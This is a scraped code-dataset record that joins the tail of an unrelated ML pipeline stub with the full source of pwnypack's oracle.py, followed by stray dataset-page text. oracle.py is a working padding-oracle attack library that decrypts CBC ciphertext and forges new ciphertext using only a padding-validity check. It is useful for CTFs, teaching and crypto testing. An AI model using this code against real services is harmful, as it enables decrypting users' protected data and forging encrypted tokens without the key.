pipeline_info: pipeline_pb2.PipelineInfo,
pipeline_runtime_spec: pipeline_pb2.PipelineRuntimeSpec
) -> metadata_store_pb2.Execution:
"""Runs the system node and return the Execution.
Args:
mlmd_connection: ML metadata connection.
pipeline_node: The specification of the node that this launcher lauches.
pipeline_info: The information of the pipeline that this node runs in.
pipeline_runtime_spec: The runtime information of the pipeline that this
node runs in.
Returns:
The execution of the run.
"""
pass
|
pwnypack/oracle.py
|
iksteen/dpf
| 133 |
76521
|
<reponame>iksteen/dpf
"""
This module provides a functions that, given an oracle function that returns
``True`` when a message is properly padded and ``False`` otherwise, will
decrypt or encrypt a given message assuming that the underlying cipher
operates in CBC mode.
"""
from __future__ import print_function, division
import functools
import multiprocessing
import threading
import os
from six.moves import map, range
__all__ = ['padding_oracle_decrypt', 'padding_oracle_encrypt']
def interruptable_iter(event, iterable):
for value in iterable:
yield value
if event.is_set():
break
def consult_oracle(oracle, chunk, block, is_last_byte):
if not oracle(bytes(chunk + block)):
return False
if is_last_byte:
chunk[-2] ^= 0x01
if not oracle(bytes(chunk + block)):
return False
return True
def check_padding_decrypt(event, oracle, block_len, chunk, block, plain, i, j):
if event.is_set():
return None
chunk, plain = chunk[:], plain[:]
plain[i] = j
chunk[i] ^= j
if consult_oracle(oracle, chunk, block, i == block_len - 1):
event.set()
return plain
def decrypt_block(oracle, block_len, alphabet, pool, progress, params):
start, prev, block, prefix, suffix, is_last_block = params
if pool is not None:
event_factory = multiprocessing.Manager().Event
map_func = pool.imap_unordered
else:
event_factory = threading.Event
map_func = map
plain = bytearray([0] * block_len)
for i, j in enumerate(prefix):
plain[i] = j
if progress is not None:
progress(start + i, j)
for i, j in enumerate(reversed(suffix)):
plain[block_len - i - 1] = j
if progress is not None:
progress(start + block_len - i - 1, j)
in_padding = is_last_block and not suffix
i = block_len - 1 - len(suffix)
while i >= len(prefix):
chunk = prev[:]
for k in range(i, block_len):
chunk[k] ^= plain[k] ^ (block_len - i)
event = event_factory()
f = functools.partial(check_padding_decrypt, event, oracle, block_len, chunk, block, plain, i)
if in_padding:
_alphabet = range(1, 17)
else:
_alphabet = alphabet
for result in map_func(f, interruptable_iter(event, _alphabet)):
if result is not None:
plain = result
if not event.is_set():
raise RuntimeError('Oracle is unstable')
if in_padding:
in_padding = False
pad_value = plain[-1]
for j in range(block_len - pad_value, i):
plain[j] = pad_value
if progress is not None:
progress(start + j, pad_value)
i -= pad_value
else:
if progress is not None:
progress(start + i, plain[i])
i -= 1
return plain
def block_pairs(block_len, data, known_prefix, known_suffix):
data_len = len(data)
suffix_len = len(known_suffix)
for prev, start, suffix_start in zip(range(data_len - block_len * 2, -1, -block_len),
range(data_len - block_len, -1, -block_len),
range(suffix_len - block_len, -data_len - 1, -block_len)):
yield (
prev,
data[prev:start],
data[start:start + block_len],
known_prefix[prev:start],
known_suffix[max(suffix_start, 0):max(suffix_start + block_len, 0)],
start + block_len == data_len
)
def padding_oracle_decrypt(oracle, ciphertext, known_prefix=b'', known_suffix=b'', block_size=128,
alphabet=None, pool=None, block_pool=None, progress=None):
"""
Decrypt ciphertext using an oracle function that returns ``True`` if the
provided ciphertext is correctly PKCS#7 padded after decryption. The
cipher needs to operate in CBC mode.
Args:
oracle(callable): The oracle function. Will be called repeatedly with
a chunk of ciphertext.
ciphertext(bytes): The data to decrypt. Should include the IV at the
start.
known_prefix(bytes): If the start of the plaintext is known, it can be
provided to skip decrypting the known prefix.
known_suffix(bytes): If the end of the plaintext is known, it can be
provided to skip decrypting the known suffix. Should include
padding.
block_size(int): The cipher's block size in bits.
alphabet(bytes): Optimize decryption if you know which characters the
plaintext will consist of.
pool(multiprocessing.Pool): A multiprocessing pool to use to
parallelize the decryption. This pool is used to call the oracle
function. Fairly heavy due to the required inter-process state
synchronization. If ``None`` (the default), no multiprocessing
will be used.
block_pool(multiprocessing.Pool): A multiprocessing pool to use to
parallelize the decryption. This pool is used to decrypt entire
blocks in parallel. When decrypting ciphertext consisting of
multiple blocks, it is usually more efficient than using the
``pool`` argument. If ``None`` (the default), no multiprocessing
will be used.
progress(callable): A callable that will be called each time a new
byte is decrypted. Is called with the positition of the character
in the plaintext result and the character itself.
Returns:
bytes: The decrypted data with its PKCS#7 padding stripped.
Raises:
RuntimeError: Raised if the oracle behaves unpredictable.
Example:
>>> from pwny import *
>>> with multiprocessing.Pool(5) as pool:
>>> print(padding_oracle_decrypt(oracle_function, encrypted_data, pool=pool))
b'decrypted data'
"""
block_len = block_size // 8
assert len(ciphertext) % block_len == 0 and len(ciphertext) >= 2 * block_len
known_prefix = bytearray(known_prefix)
known_suffix = bytearray(known_suffix)
if alphabet is None:
alphabet = bytearray(range(256))
if block_pool is not None:
map_func = block_pool.imap
else:
map_func = map
plaintext = bytearray()
decrypt_func = functools.partial(decrypt_block, oracle, block_len, alphabet, pool, progress)
for plain in map_func(decrypt_func, block_pairs(block_len, bytearray(ciphertext), known_prefix, known_suffix)):
plaintext[0:0] = plain
return bytes(plaintext[:-plaintext[-1]])
def check_padding_encrypt(event, oracle, block_len, chunk, block, i, j):
chunk = chunk[:]
chunk[i] = j
if consult_oracle(oracle, chunk, block, i == block_len - 1):
event.set()
return chunk
def encrypt_block(oracle, block_len, block, plain, pool):
if pool is not None:
event_factory = multiprocessing.Manager().Event
map_func = pool.imap_unordered
else:
event_factory = threading.Event
map_func = map
cipher = bytearray([0] * block_len)
for i in range(block_len - 1, -1, -1):
chunk = cipher[:]
for k in range(i + 1, block_len):
chunk[k] ^= block_len - i
event = event_factory()
f = functools.partial(check_padding_encrypt, event, oracle, block_len, chunk, block, i)
for result in map_func(f, interruptable_iter(event, range(256))):
if result is not None:
cipher[i] = result[i] ^ (block_len - i)
if not event.is_set():
raise RuntimeError('Oracle is unstable')
for k, p in enumerate(plain):
cipher[k] ^= p
return cipher
def padding_oracle_encrypt(oracle, plaintext, block_size=128, pool=None):
"""
Encrypt plaintext using an oracle function that returns ``True`` if the
provided ciphertext is correctly PKCS#7 padded after decryption. The
cipher needs to operate in CBC mode.
Args:
oracle(callable): The oracle function. Will be called repeatedly with
a chunk of ciphertext.
plaintext(bytes): The plaintext data to encrypt.
block_size(int): The cipher's block size in bits.
pool(multiprocessing.Pool): A multiprocessing pool to use to
parallelize the encryption. This pool is used to call the oracle
function. Fairly heavy due to the required inter-process state
synchronization. If ``None`` (the default), no multiprocessing
will be used.
Returns:
bytes: The encrypted data.
Raises:
RuntimeError: Raised if the oracle behaves unpredictable.
"""
plaintext = bytearray(plaintext)
block_len = block_size // 8
padding_len = block_len - (len(plaintext) % block_len)
plaintext.extend([padding_len] * padding_len)
ciphertext = bytearray()
chunk = bytearray(os.urandom(block_len))
ciphertext[0:0] = chunk
for plain_start in range(len(plaintext) - block_len, -1, -block_len):
plain = plaintext[plain_start:plain_start + block_len]
chunk = ciphertext[0:0] = encrypt_block(oracle, block_len, chunk, plain, pool)
return bytes(ciphertext)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.